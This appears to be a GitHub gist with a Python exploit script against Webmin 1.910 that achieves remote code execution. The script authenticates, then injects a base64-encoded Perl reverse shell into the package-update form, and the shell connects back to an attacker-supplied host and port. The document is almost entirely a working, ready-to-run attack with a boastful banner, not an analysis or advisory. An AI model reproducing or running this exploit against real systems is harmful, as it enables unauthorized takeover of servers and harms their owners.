This is a simple exploit for version 1.910 of Webmin service that leads to Remote Code Execution
#!/usr/bin/python | |
from requests import post | |
from urllib import quote | |
from base64 import b64encode | |
from requests.packages.urllib3 import disable_warnings | |
from urllib3.exceptions import InsecureRequestWarning | |
USER = 'USER' | |
PASS = 'PASSWORD' | |
RHOST = 'REMOTE_IP' | |
RPORT = 'REMOTE_PORT' | |
LHOST = 'YOUR_IP' | |
LPORT = 'YOUR_PORT' | |
SSL = True | |
PAYLOAD = "perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){{if($ENV{{$key}}=~/(.*)/){{$ENV{{$key}}=$1;}}}}$c=new IO::Socket::INET(PeerAddr,\"{}:{}\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){{if($_=~ /(.*)/){{system $1;}}}};'".format(LHOST, LPORT); | |
PAYLOAD_ENCODED = ('bash -c "{echo,' + b64encode(PAYLOAD) + '}|{base64,-d}|{bash,-i}"') | |
def base_url(): | |
return '{}://{}:{}/'.format(('https' if SSL else 'http'), RHOST, RPORT) | |
def login(): | |
params = {'user':USER, 'pass':PASS} | |
cookies = dict(testing='1', redirect='1', sid='x') | |
response = post(base_url() + 'session_login.cgi', data=params, cookies=cookies, verify=False, allow_redirects=False) | |
return response.cookies['sid'] | |
def deliver_payload(sid): | |
data = "u=acl/apt&u= | {}&ok_top=Update+Selected+Packages".format(PAYLOAD_ENCODED) | |
cookies = {'sid':sid} | |
headers = {'content-type': 'application/x-www-form-urlencoded', 'Referer':'{}/package-updates/?xnavigation=1'.format(base_url())} | |
try: | |
response = post(base_url() + 'package-updates/update.cgi', cookies=cookies, headers=headers, data=data, verify=False, allow_redirects=False) | |
except KeyboardInterrupt: | |
pass | |
def banner(): | |
print " __ __ _ _ __ ___ __ ___ " | |
print " \ \ / / | | (_) /_ | / _ \/_ | / _ \ " | |
print " \ \ /\ / /___ | |__ _ __ ___ _ _ __ ______ | | | (_) || || | | |" | |
print " \ \/ \/ // _ \| '_ \ | '_ \`_ \ | || '_ \|______|| | \__, || || | | |" | |
print " \ /\ /| __/| |_) || | | | | || || | | | | | _ / / | || |_| |" | |
print " \/ \/ \___||_.__/ |_| |_| |_||_||_| |_| |_|(_)/_/ |_| \___/ " | |
print " " | |
print " -> coded by AzraelSec (federicogerardi94[at]gmail.com) \n" | |
if __name__ == '__main__': | |
banner() | |
print 'Connecting to {}'.format(base_url()) | |
disable_warnings(category=InsecureRequestWarning) | |
session_cookie = login() | |
print 'Cookies forged: {}'.format(session_cookie) | |
print 'Attacking using this payload: {}'.format(PAYLOAD) | |
deliver_payload(session_cookie) | |
print 'Attack completed :)' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment